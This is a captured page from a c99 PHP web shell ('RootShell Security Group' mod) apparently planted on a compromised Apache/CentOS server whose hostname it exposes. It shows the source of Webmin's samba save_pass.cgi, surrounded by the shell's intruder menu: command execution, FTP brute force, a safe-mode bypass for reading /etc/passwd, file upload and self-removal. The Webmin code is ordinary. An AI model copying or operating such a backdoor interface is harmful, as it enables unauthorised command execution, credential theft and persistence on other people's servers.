!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/samba/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save_pass.cgi (2.17 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# save_pass.cgi
# Save inputs from conf_pass.cgi

require './samba-lib.pl';
&ReadParse();
&lock_file($config{'smb_conf'});
$global = &get_share("global");

# check acls

&error_setup("$text{'eacl_aviol'}ask_epass.cgi");
&error("$text{'eacl_np'} $text{'eacl_pcp'}") unless $access{'conf_pass'};

&error_setup($text{'savepass_fail'});
$nopass = (`$config{samba_password_program} 2>&1 </dev/null` =~ /encryption not selected/);
if ($in{encrypt_passwords} eq "yes" && $nopass) {
    &error($text{'savepass_nopass'});
    }
&setval("encrypt passwords", $in{encrypt_passwords}, "no");

&setval("null passwords", $in{null_passwords}, "no");

if (!$in{passwd_program_def} && !$in{passwd_program}) {
    &error($text{'savepass_passwd'});
    }
&setval("passwd program", $in{passwd_program_def}?"":$in{passwd_program}, "");

&setval("unix password sync", $in{'unix_password_sync'}, "no");

if ($in{passwd_chat_def}) { &delval("passwd chat"); }
else {
    for($i=0; defined($in{"chat_recv_$i"}); $i++) {
        push(@chat, $in{"chat_recv_$i"});
        push(@chat, $in{"chat_send_$i"});
        }
    $clast = -1;
    for($i=0; $i<@chat; $i++) {
        if ($chat[$i] =~ /\S/) { $clast = $i; }
        }
    if ($clast < 0) {
        &error($text{'savepass_chat'});
        }
    @chat = @chat[0 .. $clast];
    @chat = map { /^$/ ? "." : /^\S+$/ ? $_ : "\"$_\""; } @chat;
    &setval("passwd chat", join(' ', @chat));
    }

$mapfile = &getval("username map");
if ($in{username_map_def}) { &delval("username map"); }
else {
    if (!$mapfile) {
        $config{smb_conf} =~ /^(.*)\/[^\/]+$/;
        $mapfile = "$1/user.map";
        }
    &setval("username map", $mapfile);
    for($i=0; defined($in{"umap_unix_$i"}); $i++) {
        if ($in{"umap_unix_$i"} =~ /\S/ && $in{"umap_win_$i"} =~ /\S/) {
            if ($in{"umap_win_$i"} =~ /\s/) {
                push(@umap, $in{"umap_unix_$i"}."=\"".
                        $in{"umap_win_$i"}."\"");
                }
            else {
                push(@umap, $in{"umap_unix_$i"}."=".
                        $in{"umap_win_$i"});
                }
            }
        }
    &open_lock_tempfile(UMAP, "> $mapfile");
    foreach $line (@umap) {
        &print_tempfile(UMAP, "$line\n");
        }
    &close_tempfile(UMAP);
    }

if ($global) { &modify_share("global", "global"); }
else { &create_share("global"); }
&unlock_file($config{'smb_conf'});
&webmin_log("pass", undef, undef, \%in);
&redirect("");


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0151 ]--